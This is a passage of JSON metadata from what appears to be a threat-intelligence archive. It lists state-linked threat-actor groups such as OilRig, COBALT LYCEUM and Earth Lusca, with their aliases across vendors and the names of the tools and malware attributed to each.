"TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "386b1b0a-9217-46d4-a0d6-73d6286154e0", "created_at": "2025-08-07T02:03:24.760429Z", "updated_at": "2026-04-29T06:58:57.492935Z", "deleted_at": null, "main_name": "COBALT LYCEUM", "aliases": [ "DEV-0133 ", "HEXANE ", "ScorchedEpoch " ], "source_name": "Secureworks:COBALT LYCEUM", "tools": [ "DanBot", "MilanRAT", "RGDoor", "SharkWork RAT" ], "source_id": "Secureworks", "reports": null }, { "id": "c786e025-c267-40bd-9491-328da70811a5", "created_at": "2025-08-07T02:03:24.736817Z", "updated_at": "2026-04-29T06:58:57.579232Z", "deleted_at": null, "main_name": "COBALT GYPSY", "aliases": [ "APT34 ", "CHRYSENE ", "Crambus ", "EUROPIUM ", "Hazel Sandstorm ", "Helix Kitten ", "ITG13 ", "OilRig ", "Yellow Maero " ], "source_name": "Secureworks:COBALT GYPSY", "tools": [ "Glimpse", "Helminth", "Jason", "MacDownloader", "PoisonFrog", "RGDoor", "ThreeDollars", "TinyZbot", "Toxocara", "Trichuris", "TwoFace" ], "source_id": "Secureworks", "reports": null }, { "id": "67709937-2186-4a32-b64c-a5693d40ac77", "created_at": "2023-01-06T13:46:38.495593Z", "updated_at": "2026-04-29T06:58:56.229515Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "Cobalt Gypsy", "Helix Kitten", "APT34", "ATK40", "G0049", "EUROPIUM", "TA452", "Earth Simnavaz", "Twisted Kitten", "Crambus", "APT 34", "IRN2", "Evasive Serpens", "Hazel Sandstorm" ], "source_name": "MISPGALAXY:OilRig", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-29T06:58:57.572831Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-29T06:58:57.866084Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-29T06:58:57.704537Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "b6436f7b-6012-4969-aed1-d440e2e8b238", "created_at": "2022-10-25T16:07:23.91517Z", "updated_at": "2026-04-29T06:58:58.033485Z", "deleted_at": null, "main_name": "OilRig", "aliases": [ "APT 34", "ATK 40", "Chrysene", "Cobalt Gypsy", "Crambus", "DEV-0861", "EUROPIUM", "Earth Simnavaz", "Evasive Serpens", "G0049", "Hazel Sandstorm", "Helix Kitten", "IRN2", "ITG13", "Scarred Manticore", "Storm-0861", "TA452", "Twisted Kitten", "UNC1860", "Yellow Maero" ], "source_name": "ETDA:OilRig", "tools": [ "AMATIAS", "Agent Drable", "Agent Injector", "AgentDrable", "Alma Communicator", "BONDUPDATER", "CACTUSPIPE", "Clayslide", "CypherRat", "DNSExfitrator", "DNSpionage", "DROPSHOT", "DistTrack", "DropperBackdoor", "Fox Panel", "GREYSTUFF", "GoogleDrive RAT", "HighShell", "HyperShell", "ISMAgent", "ISMDoor", "ISMInjector", "Jason", "Karkoff", "LIONTAIL", "LOLBAS", "LOLBins", "LONGWATCH", "LaZagne", "Living off the Land", "MailDropper", "Mimikatz", "MrPerfectInstaller", "OILYFACE", "OopsIE", "POWBAT", "POWRUNER", "Plink", "Poison Frog", "PowerExchange", "PsList", "PuTTY Link", "QUADAGENT", "RDAT", "RGDoor", "SEASHARPEE", "Saitama", "Saitama Backdoor", "Shamoon", "SideTwist", "SpyNote", "SpyNote RAT", "StoneDrill", "TONEDEAF", "TONEDEAF 2.0", "ThreeDollars", "TwoFace", "VALUEVAULT", "Webmask", "WinRAR", "ZEROCLEAR", "ZeroCleare", "certutil", "certutil.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1777429339, "ts_updated_at": 1777450868, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/5c778a0a80a658b98989a084d150dd58e2286dc8.pdf", "text": "https://archive.orkl.eu/5c778a0a80a658b98989a084d150dd58e2286dc8.txt", "img": "https://archive.orkl.eu/5c778a0a80a658b98989a084d150dd58e2286dc8.jpg" } }